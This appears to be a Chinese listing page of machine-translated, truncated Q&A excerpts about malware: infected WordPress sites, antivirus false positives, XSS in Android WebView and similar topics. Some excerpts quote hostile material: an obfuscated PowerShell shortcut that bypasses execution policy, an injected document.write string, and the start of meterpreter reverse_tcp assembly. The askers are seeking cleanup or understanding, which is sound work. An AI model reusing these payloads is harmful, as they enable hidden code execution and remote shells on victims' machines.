malware相关内容
我正在使用 Webview 和 Javascript 创建一个 android 网络应用程序,使 addJavascriptInterface(true). 我的应用程序将包含将从外部站点加载的数据(html). 我在启用 addJavascriptInterface(true) 时担心我的应用的跨站点脚本 XSS/安全. 我应该注意哪些事项以免恶意代码在我的应用上运行?
..
我们正在使用一个 EC2(Ubuntu) amazon 实例来运行 Apache.最近我们注意到有一个进程使用了整个 CPU. 我们使用以下程序的帮助将其删除 [root@hadoop002 tmp]# systemctl status 25177● session-5772.scope - 用户 root 的会话 5772已加载:已加载(/run/systemd/system/ses
..
我遇到了一个关于著名的现场广告恶意软件的问题,特别是 AdcouponDropDown. 我知道这些广告通常是通过计算机上的恶意软件或作为浏览器插件创建的.然而,我的硬盘和我的 Firefox 都是干净的,但我很久以前创建的特定网站上仍然显示广告. 它作为随机生成类的 html 标签插入两个 div 之间. 网站在具有 iThemes 安全性(以前的安全性更高)的 wordpre
..
谷歌在我们的网站上检测到恶意文件/恶意软件,我用它检查过redleg 和其中一些值显示为黄色..
..
';打印 '
';打印stripslashes($data -> content);get_search_form();get_sidebar();get_footer();}出口;}?>
..
昨天我安装了几个过时的插件(我的不好),以使我的 buddypress 注册页面显示“条款和条件"复选框,从那时起,所有页面和帖子都开始在开头和底部显示一些不需要的文本. 我已经删除了所有这些插件,但仍然收到消息.我尝试了几种恶意软件扫描程序,如 wordfence、sucuri 等,但一切都表明我的网站是干净的.我现在别无选择.请帮我从我的网站上删除它. 在页面开始时出现此代码:
..
今天我去了我自己托管的 wordpress 网站,我在 Chrome 中收到一条警告说“目前在 keitarotds777.onlinepharmacy24h.net 上的攻击者可能会尝试在您的计算机上安装危险程序来窃取或删除您的信息(例如,照片、密码、消息和信用卡)." 其他浏览器也会出现这个问题. 网站是:http://dodgeballaustralia.org.au/ 有
..
在我的网站上遇到了一些讨厌的 javascript 恶意软件.我知道每个有问题的代码块都以以下内容开头: 并以 结尾 我想使用某种免费软件正则表达式替换工具,通过 Windows 上的正则表达式删除讨厌的部分.这里有什么建议吗?非常感谢. 解决方案 我认为你应该使用 configure Privoxy (http://privoxy.org).它使用 PCRE 库,可用于 W
..
我遇到了一件很奇怪的事情.我用 C# 编写了一个非常简单的程序,并尝试构建它的 32 位和 64 位版本.64 位版本工作正常,但每当我尝试构建 32 位版本时,我的防病毒软件都会将其删除.我已经将这两个文件上传到了virustotal: 32位: https://virustotal.com/da/file/fdb3d2870ce876b49eb5d9371fc0b133b7657ddd9
..
我正在帮助某人清理网站上的恶意软件感染,但我很难正确匹配 sed 中的某些字符串,因此我可以创建一个脚本来批量搜索并替换/删除它. 字符串是: document.write('.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}
..
是否有人对如何防止对独立应用程序进行恶意软件攻击有任何想法.假设这是连接到互联网的 Windows 机器上的程序,这是最常见的情况. 我还想知道什么类型的攻击是可能的.我相信 .NET 会在运行之前对代码进行某种类型的静态检查,使用一种校验和.这将检测静态附加的恶意代码片段.这能解决吗? 动态注入的代码呢?单独的程序空间在某种程度上防止了这种情况.感染数据文件怎么办?将数据存储在数据库
..
我下载了一个我几乎没有仔细考虑过的文件,但是(快捷方式的)目标引起了我的注意: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP .( $shelliD[1]+$SHeLlID[13]+'x') ([String]::jOin( '',[Char[]](36 ,97,115, 112
..
是否有执行政策的解决方法? PS C:\Users\thufir\Desktop>PS C:\用户\thufir\桌面>.\stock.ps1.\stock.ps1 :文件 C:\Users\thufir\Desktop\stock.ps1 无法加载,因为在此禁用运行脚本系统.有关详细信息,请参阅 http://go.microsoft.com/fwlink/?LinkID=135170 上的
..
大约两个月以来,我一直在享受 Windows XP Home SP3 上严重的进程创建惩罚.这个问题在创建大量进程的任务中最为明显和恼人,例如 shell 脚本(顺便说一句,Cygwin 上的 bash 脚本)、Makefiles 或解压 IzPack 包,例如 SpringSource Tool Suite 安装程序(许多单独的 unpack200.exe JAR 提取器进程).我确定这是通过观
..
我用 Python 2.x、PyQT4 和 MySQLdb 为我的公司编写了一个应用程序,并用 py2exe 打包. 最近,我对该应用程序进行了一些更新,将其移植到 Python 3.4 和 PySide.我还删除了 MySQLdb 依赖项并添加了请求.我将它与用于 Python 3 的新生成的 py2exe 打包在一起. 我突然被 Windows 防御者标记为我的可执行文件是恶意软件
..
我正在调查由在沙箱中运行的恶意软件发出的一组 Windows API 系统调用,以便我能够了解其恶意意图.不幸的是,我很难理解文档中描述的 ZwMapViewOfSection 函数:https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/wdm/nf-wdm-zwmapviewofsection 现在,我明
..
我在同一个网络服务器上托管了三个网站.最近我在其中一个网站上工作,注意到大约一个月前,一堆文件被更改了.具体来说,index.html 的所有实例都被重命名为 index.html.bak.bak,并且 index.php 文件已经被放入他们的地方.index.php 文件比较简单;它们包含一个隐藏在每个网站文件系统(似乎是一个随机文件夹)中某处的文件,该文件已被 JS 十六进制编码混淆,然后回显
..
我在php网站上工作,它经常受到恶意软件的感染.我已经完成了所有安全步骤,但失败了.但是我知道每次感染代码的方式.它来自我的PHP索引文件的开头,如下所示. .....< ;? 有人可以帮助我如何删除服务器文件夹中每个索引文件的起始块代码?我将为此使用cron. 我已经遇到了正则表达式问题来删除javascript恶意软件但没有找到我想要的.
..
我提取了 windows/meterpreter/reverse_tcp 有效载荷的汇编代码,其中lhost设置为 127.0.0.1 ,lport设置为 443 ,但是,在使用 fasm 构建汇编程序之后,该程序崩溃了,为什么会有任何想法? 汇编代码: format PE控制台使用32进入开始开始:amov ebp,esp异或mov edx,[fs:edx + 0x30]mov edx
..
试图避免我的观点接触到来自叠加层的反馈.... 这是一个例子,有人可以在Android上进行黑客入侵,以使用户无意中按下系统按钮属性,甚至输入凭据来执行与最初意图完全不同的操作: http://www.youtube.com/watch?v=gCLU7YUXUAY 我想确认设置属性 android:filterTouchesWhenObscured ="true" 在我的
..